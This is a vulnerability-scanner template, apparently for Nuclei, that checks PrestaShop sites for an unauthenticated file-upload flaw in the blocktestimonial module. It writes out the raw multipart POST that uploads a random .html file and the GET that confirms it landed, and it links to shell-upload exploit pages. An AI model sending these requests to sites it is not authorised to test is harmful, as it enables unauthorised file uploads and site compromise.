id: prestashop-blocktestimonial-file-upload info: name: Prestashop Blocktestimonial Modules - File Upload Vulnerability author: MaStErChO severity: critical reference: - https://3xploit7.blogspot.com/2016/12/pretashop-blocktestimonial-upload-shell.html - https://github.com/indoxploit-coders/blocktestimonial-file-upload - https://exploit.linuxsec.org/prestashop-module-blocktestimonial-file-upload-auto-exploit metadata: max-request: 2 framework: prestashop shodan-query: "http.component:\"prestashop\"" product: ap_pagebuilder vendor: apollotheme tags: intrusive,file-upload,blocktestimonial,prestashop variables: filename: '{{rand_base(7, "abc")}}' data: '{{rand_base(6, "abc")}}' http: - raw: - | POST /modules/blocktestimonial/addtestimonial.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLSo7Btb6nGcpR9Cl ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl Content-Disposition: form-data; name="testimonial_submitter_name" {{data}} ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl Content-Disposition: form-data; name="testimonial_title" {{data}} ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl Content-Disposition: form-data; name="testimonial_main_message" {{data}} ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl Content-Disposition: form-data; name="testimonial_img"; filename="{{filename}}.html" Content-Type: text/html

------WebKitFormBoundaryLSo7Btb6nGcpR9Cl Content-Disposition: form-data; name="testimonial" Submit Testimonial ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl-- - | GET /upload/{{filename}}.html HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_1 words: - "Your testimonial was submitted successfully." - type: word part: body_2 words: - "{{data}}" # digest: 4a0a00473045022100c984bd63a047486923f12a6c43fab688a3b449c4e998f2be0716cffbc4c5588002206597d4bf4b15aa9ee8bad8eabc6c41980c9fd5de2909f4c1c5b35dc2ef0b0542:922c64590222798bb761d5b6d8e72950